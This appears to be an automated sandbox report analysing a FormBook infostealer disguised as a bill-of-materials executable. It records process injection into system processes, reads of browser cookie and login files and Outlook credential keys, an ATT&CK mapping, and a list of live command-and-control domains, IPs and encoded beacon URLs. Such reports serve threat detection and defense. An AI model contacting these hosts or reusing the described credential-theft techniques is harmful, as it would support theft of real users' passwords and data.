            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039B226 SendInput,keybd_event,0_2_0039B226
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003B22DA
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"Jump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00390B62
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00391663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00391663
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593049940.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: Copy of 01. Bill of Material - 705.exe, GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593049940.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593049940.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00350698 cpuid 0_2_00350698
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_003A8195
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0038D27A GetUserNameW,0_2_0038D27A
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0036B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0036B952
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: WIN_81
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: WIN_XP
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: WIN_XPe
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: WIN_VISTA
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: WIN_7
            Source: Copy of 01. Bill of Material - 705.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_003B1204
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003B1806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1497886 Sample: Copy of 01. Bill of Materia... Startdate: 23/08/2024 Architecture: WINDOWS Score: 100 28 www.jaxo.xyz 2->28 30 www.weep.site 2->30 32 18 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 6 other signatures 2->50 10 Copy of 01. Bill of Material - 705.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 GQXHQykfhUHHi.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 GQXHQykfhUHHi.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.jaxo.xyz 66.29.149.180, 49738, 49739, 49740 ADVANTAGECOMUS United States 22->34 36 tadalaturbo.online 192.185.211.122, 49772, 49773, 49774 UNIFIEDLAYER-AS-1US United States 22->36 38 12 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Copy of 01. Bill of Material - 705.exe39%ReversingLabs
            Copy of 01. Bill of Material - 705.exe29%VirustotalBrowse
            Copy of 01. Bill of Material - 705.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            tadalaturbo.online1%VirustotalBrowse
            fontanerourgente.net0%VirustotalBrowse
            weep.site2%VirustotalBrowse
            www.anaidittrich.com0%VirustotalBrowse
            www.xforum.tech1%VirustotalBrowse
            www.jaxo.xyz1%VirustotalBrowse
            32wxd.top0%VirustotalBrowse
            www.taapbit.online1%VirustotalBrowse
            www.jiyitf.top1%VirustotalBrowse
            www.tadalaturbo.online1%VirustotalBrowse
            www.onlytradez.club2%VirustotalBrowse
            www.32wxd.top1%VirustotalBrowse
            www.88nn.pro0%VirustotalBrowse
            www.weep.site1%VirustotalBrowse
            www.fontanerourgente.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://mgmasistencia.com/acerca-de/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.anaidittrich.com/qpwk/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://mgmasistencia.com/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%VirustotalBrowse
            http://www.cannulafactory.top/l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qX0%Avira URL Cloudsafe
            https://tilda.cc0%Avira URL Cloudsafe
            http://www.anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo=0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/0%Avira URL Cloudsafe
            https://mgmasistencia.com/0%VirustotalBrowse
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%Avira URL Cloudsafe
            https://twitter.com/wordpress0%Avira URL Cloudsafe
            https://tilda.cc1%VirustotalBrowse
            https://mgmasistencia.com/blog/0%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%VirustotalBrowse
            http://www.ayypromo.shop/rgqx/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%VirustotalBrowse
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%VirustotalBrowse
            https://es.wordpress.org/0%Avira URL Cloudsafe
            https://twitter.com/wordpress0%VirustotalBrowse
            http://www.xforum.tech/647x/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.40%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            https://mgmasistencia.com/acerca-de/0%VirustotalBrowse
            https://mgmasistencia.com/blog/0%VirustotalBrowse
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%VirustotalBrowse
            http://www.jiyitf.top/uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qX0%Avira URL Cloudsafe
            https://es.wordpress.org/0%VirustotalBrowse
            http://www.onlytradez.club/zctj/0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/?Xn70_=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&mV=ZpN4DLSXOzy8qX0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/comments/feed/0%Avira URL Cloudsafe
            https://mgmasistencia.com/wp-json/0%Avira URL Cloudsafe
            https://www.551108k5.shop/0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/?Xn70_=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&mV=ZpN4DLSXOzy8qX0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.datensicherung.email/gs9g/0%Avira URL Cloudsafe
            http://www.jiyitf.top/uhl0/0%Avira URL Cloudsafe
            https://mgmasistencia.com/contacto/0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/?Xn70_=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=&mV=ZpN4DLSXOzy8qX0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw=0%Avira URL Cloudsafe
            http://www.datensicherung.email/gs9g/?Xn70_=1tUju/dHge3HLZSdE2k0YsxyInHY2hrxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90+uGeV46P8z2dJC38PhOXMX6lRwcpgLQeWu7EugNpVbCb7i9ISyk=&mV=ZpN4DLSXOzy8qX0%Avira URL Cloudsafe
            http://www.jaxo.xyz/f9bc/0%Avira URL Cloudsafe
            https://mgmasistencia.com/feed/0%Avira URL Cloudsafe
            http://www.tadalaturbo.online0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.40%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/?Xn70_=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&mV=ZpN4DLSXOzy8qX0%Avira URL Cloudsafe
            http://www.redhat.com/docs/manuals/enterprise/0%Avira URL Cloudsafe
            http://www.tadalaturbo.online/7o3y/?mV=ZpN4DLSXOzy8qX&Xn70_=34bWgTnU4AX1gKZpgT03P58mZraF9WQxUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UwsXUXfif+FOOr40nRowl+nZyE3/KMRkY0oHOpy0tGVDF3Z+R9aA=0%Avira URL Cloudsafe
            https://wordpress.org/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/0%Avira URL Cloudsafe
            https://www.hostgator.com.br0%Avira URL Cloudsafe
            http://www.tadalaturbo.online/7o3y/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-10%Avira URL Cloudsafe
            http://www.551108k5.shop/0or4/0%Avira URL Cloudsafe
            https://mgmasistencia.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox540%Avira URL Cloudsafe
            http://www.redhat.com/0%Avira URL Cloudsafe
            http://anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVv0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ayypromo.shop
            		176.57.64.102
            		truefalse
              		unknown
              tadalaturbo.online
              		192.185.211.122
              		truefalseunknown
              fontanerourgente.net
              		37.187.158.211
              		truefalseunknown
              weep.site
              		194.233.65.154
              		truefalseunknown
              www.cannulafactory.top
              		18.183.3.45
              		truefalse
                		unknown
                www.anaidittrich.com
                		162.55.254.209
                		truefalseunknown
                gangli.ssywan.com
                		64.64.237.133
                		truefalse
                  		unknown
                  www.xforum.tech
                  		103.224.182.242
                  		truefalseunknown
                  www.datensicherung.email
                  		85.13.151.9
                  		truefalse
                    		unknown
                    www.jaxo.xyz
                    		66.29.149.180
                    		truetrueunknown
                    32wxd.top
                    		206.119.82.116
                    		truefalseunknown
                    www.jiyitf.top
                    		172.67.215.136
                    		truefalseunknown
                    www.onlytradez.club
                    		167.172.133.32
                    		truefalseunknown
                    www.88nn.pro
                    		45.157.69.194
                    		truefalseunknown
                    www.551108k5.shop
                    		unknown
                    		unknowntrue
                      		unknown
                      www.taapbit.online
                      		unknown
                      		unknowntrueunknown
                      www.tadalaturbo.online
                      		unknown
                      		unknowntrueunknown
                      www.32wxd.top
                      		unknown
                      		unknowntrueunknown
                      www.weep.site
                      		unknown
                      		unknowntrueunknown
                      www.fontanerourgente.net
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.anaidittrich.com/qpwk/false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.cannulafactory.top/l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qXfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo=false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.cannulafactory.top/l90v/false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.ayypromo.shop/rgqx/false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.xforum.tech/647x/false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.jiyitf.top/uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qXfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.onlytradez.club/zctj/false
                      • Avira URL Cloud: safe
                      		unknown
